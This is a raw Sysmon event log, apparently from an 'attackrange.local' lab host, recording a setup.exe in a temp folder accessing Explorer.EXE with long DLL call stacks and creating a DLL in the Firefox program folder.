13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-conio-l1-1-0.dll2021-01-18 13:59:52.146 10341000x800000000000000014268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014259Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014258Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014257Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.146{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
